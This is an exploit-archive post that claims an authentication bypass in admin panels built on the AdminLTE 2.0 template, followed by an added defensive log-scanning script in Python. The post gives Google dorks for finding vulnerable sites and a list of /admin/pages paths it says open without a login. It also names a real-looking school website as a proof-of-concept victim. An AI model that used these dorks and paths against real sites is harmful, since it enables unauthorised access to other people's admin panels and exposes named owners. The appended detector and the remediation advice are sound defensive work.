Topic: @ F-Online Almsaeed Studio AdminLTE 2 ImproperAuth Vuln
KingSkrupellos
05.09.2018 01:20
#################################################################################################

# Exploit Title : Web Design @ F-Online Almsaeed Studio AdminLTE 2.0 Improper Authentication Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 05/09/2018
# Vendor Homepages : almsaeedstudio.com ~ adminlte.io ~ redwanullah.com
# Tested On : Windows
# Software Information Link by Owner => github.com/almasaeed2010/AdminLTE
# Category : WebApps
# Version : 2.0
# Exploit Risk : Medium
# CWE : CWE-284 [Improper Access Control ] - CWE-287 - [ Improper Authentication ]

#################################################################################################

# Google Dorks :

intext:''Copyright © 2014-2015 Almsaeed Studio'' Version 2.0

intext:''Development and Design by @ F-Online''

Admin Control Panel Path => /admin/login.php

No username and password are required. Just enter these directory files after the URL. Successful.

# Exploits :

/admin/documentation/
/admin/pages/calendar.html
/admin/pages/UI/general.html
/admin/pages/UI/icons.html
/admin/pages/UI/log.php
/admin/pages/UI/modals.html
/admin/pages/UI/sliders.html
/admin/pages/UI/timeline.html
/admin/pages/charts/chartjs.html
/admin/pages/charts/flot.html
/admin/pages/charts/inline.html
/admin/pages/charts/morris.html
/admin/pages/examples/blank.html
/admin/pages/examples/invoice-print.html
/admin/pages/examples/invoice.html
/admin/pages/examples/lockscreen.html
/admin/pages/examples/login.html
/admin/pages/forms/advanced.html
/admin/pages/forms/editors.html
/admin/pages/forms/general.html
/admin/pages/layout/boxed.html
/admin/pages/layout/collapsed-sidebar.html
/admin/pages/layout/fixed.html
/admin/pages/layout/rtl.html
/admin/pages/layout/top-nav.html
/admin/pages/mailbox/compose.html
/admin/pages/mailbox/mailbox.html
/admin/pages/mailbox/read-mail.html
/admin/pages/tables/data.html
/admin/pages/tables/simple.html
/admin/pages/widgets.html
/admin/pages/examples/register.html

#################################################################################################

# Example Site => aditmarigsmhsc.edu.bd/admin/pages/calendar.html => [ Proof of Concept ] => archive.is/jXzGu

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# There is an organ in the human body. If it is sound, the whole body is sound;
if it is corrupted, the whole body is corrupted. Take heed! It is the heart.
[ Hz.Muhammed S.A.V ] #


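A defender-side check for the exposure described in the post, as an added example that is not part of the original post: it scans web server access logs for template pages under `/admin/` that were actually served. The common/combined log format, the function names and the sample log lines are assumptions made for illustration; only the two path prefixes come from the post.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Prefixes taken from the paths listed in the post; the rest is assumed.
TEMPLATE_PREFIXES = ("/admin/pages/", "/admin/documentation/")

# Assumption: Apache/nginx common or combined access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize(raw_path):
    """Drop the query string, decode %xx, collapse '//' and '..', lowercase."""
    path = unquote(raw_path.split("?", 1)[0])
    path = posixpath.normpath(re.sub(r"/+", "/", path))
    return path.lower()  # Windows hosts serve paths case-insensitively

def find_template_hits(lines):
    """Return {client_ip: [paths]} for template pages the server handed out."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line: skip instead of guessing
        status = int(m.group("status"))
        served = 200 <= status < 300 or status == 304
        path = normalize(m.group("path"))
        # normpath strips a trailing slash, so re-add one before matching
        if served and (path + "/").startswith(TEMPLATE_PREFIXES):
            hits[m.group("ip")].append(path)
    return dict(hits)

# Constructed sample lines (documentation-range IPs), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Sep/2018:01:20:11 +0000] "GET /admin/pages/calendar.html HTTP/1.1" 200 5120',
    '203.0.113.7 - - [05/Sep/2018:01:20:12 +0000] "GET /admin//pages/UI/../forms/general.html?x=1 HTTP/1.1" 200 901',
    '198.51.100.20 - - [05/Sep/2018:01:21:00 +0000] "GET /admin/login.php HTTP/1.1" 200 2210',
    '198.51.100.20 - - [05/Sep/2018:01:21:03 +0000] "GET /admin/pages/widgets.html HTTP/1.1" 302 0',
    '192.0.2.44 - - [05/Sep/2018:01:22:40 +0000] "GET /admin/documentation/ HTTP/1.1" 200 7733',
    '192.0.2.44 - - [05/Sep/2018:01:22:41 +0000] "GET /Admin/Pages/%63harts/flot.html HTTP/1.1" 304 0',
]

if __name__ == "__main__":
    for ip, paths in find_template_hits(SAMPLE_LOG).items():
        print(ip, sorted(set(paths)))
```

A served response for these paths means the template's demo pages are deployed and reachable without going through `/admin/login.php`. Removing the leftover `pages/` and `documentation/` directories, or placing them behind the same authentication check as the rest of the panel, closes the exposure.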